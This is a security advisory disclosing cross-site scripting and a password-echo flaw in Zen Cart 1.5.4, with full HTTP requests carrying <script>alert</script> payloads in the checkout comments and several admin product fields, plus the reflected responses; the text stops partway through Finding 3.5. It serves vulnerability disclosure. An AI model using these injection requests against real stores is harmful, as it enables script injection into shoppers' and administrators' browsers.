Trustwave SpiderLabs Security Advisory TWSL2016-006:
Multiple Vulnerabilities in Zen Cart

Published: 03/22/2016
Version: 1.0

Vendor: Zen Ventures, LLC (http://www.zen-cart.com/)
Product: Zen Cart
Version affected: 1.5.4 and prior versions

Product description:
Zen Cart is an online store management system. It is PHP-based, using a
MySQL database and HTML components.

Finding 1: Cross Site Scripting Vulnerability
Credit: Michael Yuen of Trustwave SpiderLabs
CWE: CWE-79

A cross-site scripting vulnerability is present in the Zen Cart payment 
information page (/index.php?main_page=checkout_payment) in the comments 
parameter. The vulnerability has been confirmed on Firefox 39.

Submitting a comment with an invalid Redemption Code results in a reflection of 
the comments in an unfiltered textarea element. In addition, the XSS is 
persistent for the duration of the user's session.

Example:

POST /zen-cart-v1.5.4-12302014/index.php?main_page=checkout_confirmation HTTP/1.1
Host: localhost:88
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:88/zen-cart-v1.5.4-12302014/index.php?main_page=checkout_payment
Cookie: zenid=6f6v1obdaip2ncvjol14d0cc90
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 182

securityToken=29c60cb39a8bbf22586bb300defbff58&action=submit&dc_redeem_code=abc&payment=moneyorder&comments=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&x=22&y=29

#Response for /index.php?main_page=checkout_payment

<--------------snip----------->
<legend>Special Instructions or Order Comments</legend>
<textarea name="comments" cols="45" rows="3"></textarea><script>alert("XSS")</script></textarea></fieldset>
<--------------snip----------->

Remediation Steps:
The following general recommendations can help mitigate the risk associated with Cross-Site Scripting vulnerabilities. 

· Ensure that your web application validates all forms, headers, cookie fields, hidden fields, and parameters, and converts scripts and script tags to a non-executable form.
· Consider converting JavaScript and HTML tags into alternate HTML encodings (such as “<” to “&lt;>.

Finding 2: Cleartext Transmission of Sensitive Information involving
the password in a failed login response
Credit: Sriram Akurati of Trustwave SpiderLabs
CWE: CWE-319

When attempting a login with an invalid password, the resulting response contains that invalid password.

POST /zen-cart-v1.5.4-12302014/index.php?main_page=login&action=process HTTP/1.1
Host: localhost:88
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:88/zen-cart-v1.5.4-12302014/index.php?main_page=login&action=process
Cookie: zenid=8p6tl9o6q875tskgvoohus2us3
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 153

securityToken=46b84fd35a8199018af4516a4e5e3ff7&email_address=foo%40bar.com&password=123456&securityToken=46b84fd35a8199018af4516a4e5e3ff7&x=0&y=0

#Response
<--------------snip----------->
<label class="inputLabel" for="login-password">Password:</label>
<input type="password" name="password" value="123456&quot;__'" size = "41" maxlength= "255" id="login-password" autocomplete="off" /><br class="clearBoth" />
<input type="hidden" name="securityToken" value="46b84fd35a8199018af4516a4e5e3ff7" /></fieldset>
<--------------snip----------->

Finding 3: Cross Site Scripting Vulnerabilities
Credit: Michael Yuen and Sriram Akurati of Trustwave SpiderLabs
CWE: CWE-79

Various cross-site scripting vulnerabilities exist in the Zen Cart
admin interface.

Finding 3.1:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: products_description[2]
Injection value: <script>alert(14405309.14397)</script>
Detection value: <script>alert(14405309.14397)</script>

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product_preview&page=1 HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=2&pID=2&action=new_product
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------31870220875781
Content-Length: 4875

-----------------------------31870220875781
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------31870220875781
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------31870220875781
Content-Disposition: form-data; name="x"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="y"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="master_category"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------31870220875781
Content-Disposition: form-data; name="products_status"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------31870220875781
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------31870220875781
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------31870220875781
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_price"

12
-----------------------------31870220875781
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------31870220875781
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------31870220875781
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------31870220875781
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------31870220875781
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------31870220875781
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_description[2]"

<script>alert(14405309.14397)</script>
-----------------------------31870220875781
Content-Disposition: form-data; name="products_description[1]"

test
-----------------------------31870220875781
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------31870220875781
Content-Disposition: form-data; name="products_model"

testval
-----------------------------31870220875781
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------31870220875781
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------31870220875781
Content-Disposition: form-data; name="img_dir"

3ds/
-----------------------------31870220875781
Content-Disposition: form-data; name="image_delete"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="overwrite"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_image_manual"

25
-----------------------------31870220875781
Content-Disposition: form-data; name="products_url[2]"

http://www.kelev.biz
-----------------------------31870220875781
Content-Disposition: form-data; name="products_url[1]"

http://www.kelev.biz
-----------------------------31870220875781
Content-Disposition: form-data; name="products_weight"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------31870220875781--



HTTP Response 
----Truncated due to large size ---

pes</a></li>
              </ul>
    </li>
      </ul>
</div>
<!-- header_eof //-->

<!-- body //-->
<table border="0" width="100%" cellspacing="2" cellpadding="2">
  <tr>
<!-- body_text //-->
    <td width="100%" valign="top">
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/testval/images/25" border="0" alt="admin" title=" admin ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/3ds/25" border="0" alt="3ds/25" title=" 3ds/25 " width="100" height="80" align="right" hspace="5" vspace="5"><script>alert(14405309.14397)</script>        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://http://www.kelev.biz" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/english/images/icon.gif" border="0" alt="English" title=



Finding 3.2:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: products_description[1]
Injection value: <script>alert(14405309.14557)</script>
Detection value: <script>alert(14405309.14557)</script>

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product_preview&page=1 HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=2&pID=2&action=new_product
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------31870220875781
Content-Length: 4883

-----------------------------31870220875781
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------31870220875781
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------31870220875781
Content-Disposition: form-data; name="x"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="y"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="master_category"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------31870220875781
Content-Disposition: form-data; name="products_status"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------31870220875781
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------31870220875781
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------31870220875781
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_price"

12
-----------------------------31870220875781
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------31870220875781
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------31870220875781
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------31870220875781
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------31870220875781
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------31870220875781
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_description[2]"

Default text
-----------------------------31870220875781
Content-Disposition: form-data; name="products_description[1]"

<script>alert(14405309.14557)</script>
-----------------------------31870220875781
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------31870220875781
Content-Disposition: form-data; name="products_model"

testval
-----------------------------31870220875781
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------31870220875781
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------31870220875781
Content-Disposition: form-data; name="img_dir"

3ds/
-----------------------------31870220875781
Content-Disposition: form-data; name="image_delete"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="overwrite"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_image_manual"

25
-----------------------------31870220875781
Content-Disposition: form-data; name="products_url[2]"

http://www.kelev.biz
-----------------------------31870220875781
Content-Disposition: form-data; name="products_url[1]"

http://www.kelev.biz
-----------------------------31870220875781
Content-Disposition: form-data; name="products_weight"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------31870220875781--



HTTP Response 
----Truncated due to large size ---

" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/english/images/icon.gif" border="0" alt="English" title=" English ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/3ds/25" border="0" alt="3ds/25" title=" 3ds/25 " width="100" height="80" align="right" hspace="5" vspace="5"><script>alert(14405309.14557)</script>        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://http://www.kelev.biz" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
<form name="update_product" action="http://localhost:8081/zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=update_product&page=1" method="post" enctype="multipart/form-data"><input type="hidden" name="securityToken" value="9adbdf7813e8bda76f1aa498b0b5f4ea" />      <tr>
        <td align="right" class="smal



Finding 3.3:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: img_dir
Injection value: >"><script>alert(14405309.14977)</script>
Detection value: alert(14405309.14977)

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product_preview&page=1 HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=2&pID=2&action=new_product
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------31870220875781
Content-Length: 4886

-----------------------------31870220875781
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------31870220875781
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------31870220875781
Content-Disposition: form-data; name="x"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="y"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="master_category"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------31870220875781
Content-Disposition: form-data; name="products_status"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------31870220875781
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------31870220875781
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------31870220875781
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_price"

12
-----------------------------31870220875781
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------31870220875781
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------31870220875781
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------31870220875781
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------31870220875781
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------31870220875781
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_description[2]"

Default text
-----------------------------31870220875781
Content-Disposition: form-data; name="products_description[1]"

test
-----------------------------31870220875781
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------31870220875781
Content-Disposition: form-data; name="products_model"

testval
-----------------------------31870220875781
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------31870220875781
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------31870220875781
Content-Disposition: form-data; name="img_dir"

>"><script>alert(14405309.14977)</script>
-----------------------------31870220875781
Content-Disposition: form-data; name="image_delete"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="overwrite"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_image_manual"

25
-----------------------------31870220875781
Content-Disposition: form-data; name="products_url[2]"

http://www.kelev.biz
-----------------------------31870220875781
Content-Disposition: form-data; name="products_url[1]"

http://www.kelev.biz
-----------------------------31870220875781
Content-Disposition: form-data; name="products_weight"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------31870220875781--



HTTP Response 
----Truncated due to large size ---

Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/media_types.php">Media Types</a></li>
              </ul>
    </li>
      </ul>
</div>
<!-- header_eof //-->

<!-- body //-->
<table border="0" width="100%" cellspacing="2" cellpadding="2">
  <tr>
<!-- body_text //-->
    <td width="100%" valign="top">
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/testval/images/25" border="0" alt="admin" title=" admin ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/>"><script>alert(14405309.14977)</script>25" border="0" alt=">"><script>alert(14405309.14977)</script>25" title=" >"><script>alert(14405309.14977)</script>25 " width="100" height="80" align="right" hspace="5" vspace="5">Default text        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://http://www.kelev.biz" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspaci



Finding 3.4:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: products_image_manual
Injection value: >"><script>alert(14405309.15017)</script>
Detection value: alert(14405309.15017)

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product_preview&page=1 HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=2&pID=2&action=new_product
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------31870220875781
Content-Length: 4888

-----------------------------31870220875781
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------31870220875781
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------31870220875781
Content-Disposition: form-data; name="x"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="y"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="master_category"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------31870220875781
Content-Disposition: form-data; name="products_status"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------31870220875781
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------31870220875781
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------31870220875781
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_price"

12
-----------------------------31870220875781
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------31870220875781
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------31870220875781
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------31870220875781
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------31870220875781
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------31870220875781
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_description[2]"

Default text
-----------------------------31870220875781
Content-Disposition: form-data; name="products_description[1]"

test
-----------------------------31870220875781
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------31870220875781
Content-Disposition: form-data; name="products_model"

testval
-----------------------------31870220875781
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------31870220875781
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------31870220875781
Content-Disposition: form-data; name="img_dir"

3ds/
-----------------------------31870220875781
Content-Disposition: form-data; name="image_delete"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="overwrite"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_image_manual"

>"><script>alert(14405309.15017)</script>
-----------------------------31870220875781
Content-Disposition: form-data; name="products_url[2]"

http://www.kelev.biz
-----------------------------31870220875781
Content-Disposition: form-data; name="products_url[1]"

http://www.kelev.biz
-----------------------------31870220875781
Content-Disposition: form-data; name="products_weight"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------31870220875781--



HTTP Response
----Truncated due to large size --- 

ger</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/media_types.php">Media Types</a></li>
              </ul>
    </li>
      </ul>
</div>
<!-- header_eof //-->

<!-- body //-->
<table border="0" width="100%" cellspacing="2" cellpadding="2">
  <tr>
<!-- body_text //-->
    <td width="100%" valign="top">
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/testval/images/25" border="0" alt="admin" title=" admin ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/3ds/>"><script>alert(14405309.15017)</script>" border="0" alt="3ds/>"><script>alert(14405309.15017)</script>" title=" 3ds/>"><script>alert(14405309.15017)</script> " width="100" height="80" align="right" hspace="5" vspace="5">Default text        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://http://www.kelev.biz" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspa



Finding 3.5:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: products_url[2]
Injection value: >"><script>alert(14405309.15227)</script>
Detection value: alert(14405309.15227)

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product_preview&page=1 HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=2&pID=2&action=new_product
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------31870220875781
Content-Length: 4870

-----------------------------31870220875781
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------31870220875781
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------31870220875781
Content-Disposition: form-data; name="x"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="y"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="master_category"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------31870220875781
Content-Disposition: form-data; name="products_status"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------31870220875781
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------31870220875781
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------31870220875781
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_price"

12
-----------------------------31870220875781
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------31870220875781
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------31870220875781
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------31870220875781
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------31870220875781
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------31870220875781
